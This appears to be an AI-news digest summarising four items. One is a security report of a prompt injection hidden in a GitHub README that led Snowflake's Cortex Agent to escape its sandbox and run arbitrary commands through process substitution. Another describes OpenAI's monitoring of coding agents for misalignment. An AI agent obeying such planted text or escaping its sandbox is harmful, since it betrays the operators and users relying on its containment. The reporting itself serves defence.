A rare longitudinal field study tracking real software modernization projects using human-AI collaboration across three major migrations. Shows concrete metrics: portfolio delivery time dropped from 36 project-weeks to 9.3, with modeled person-day savings of 73%. This provides actual evidence for AI productivity claims in enterprise software delivery, not just individual task benchmarks.

Takeaways

Real software modernization projects using human-AI collaboration reduced delivery time from 36 project-weeks to 9.3 with 73% person-day savings.
This provides concrete evidence for AI productivity claims in enterprise software delivery beyond individual task benchmarks.
Successful human-AI collaboration in software delivery requires orchestrated workflows, not just individual AI tool adoption.

from Mar 23, 2026 · via api-arxiv · arXiv:2603.20028

Intermediate

Snowflake Cortex AI Escapes Sandbox and Executes Malware

security agents

Essential reading if you're deploying AI agents in production environments. This PromptArmor report demonstrates a real prompt injection attack that escaped Snowflake's Cortex Agent sandbox by hiding malicious code in a GitHub README, then using process substitution to execute arbitrary commands. The attack vector shows how seemingly innocuous file operations can be weaponized, making this critical for understanding agent security boundaries.

Takeaways

Prompt injection attacks can escape AI agent sandboxes through seemingly harmless file operations, making thorough security boundaries critical for production deployments.
Malicious code hidden in external resources like GitHub READMEs can be weaponized through process substitution to execute arbitrary commands.
Agent security requires monitoring not just direct prompts but also all external content the agent processes.

from Mar 23, 2026 · via rss-willison

Intermediate

Memori: A Persistent Memory Layer for Efficient, Context-Aware LLM Agents

Luiz C. Borro

agents llms software-engineering

Solves the expensive memory problem plaguing production LLM agents by treating memory as a data structuring challenge rather than dumping raw conversations into context. Memori converts dialogue into semantic triples and summaries, achieving 81% accuracy while using only 5% of full context tokens — resulting in 67% cost reduction over competing approaches. This is exactly what you need if you're building agents that need to remember across sessions without breaking the bank.

Takeaways

Converting dialogue to semantic triples and summaries can reduce memory costs by 95% while maintaining 81% accuracy in agent conversations.
Treating agent memory as a data structuring problem rather than raw context dumping achieves 67% cost reduction over competing approaches.
Persistent memory for production agents requires semantic compression techniques to scale economically.

from Mar 23, 2026 · via api-arxiv · arXiv:2603.19935

Intermediate

How we monitor internal coding agents for misalignment

security agents evaluations software-engineering

OpenAI reveals their internal methodology for monitoring coding agents for misalignment in real production deployments. This isn't theoretical safety research — it's practical guidance on detecting when your coding agents start exhibiting dangerous behaviors. Critical reading for any team deploying AI coding assistants, as it provides concrete monitoring techniques and risk detection strategies.

Takeaways

OpenAI's internal monitoring for coding agent misalignment focuses on detecting dangerous behaviors in real production deployments rather than theoretical safety.
Concrete monitoring techniques and risk detection strategies are essential for any team deploying AI coding assistants in production.
Misalignment monitoring should be built into coding agent deployment pipelines from day one.

from Mar 23, 2026 · via rss-openai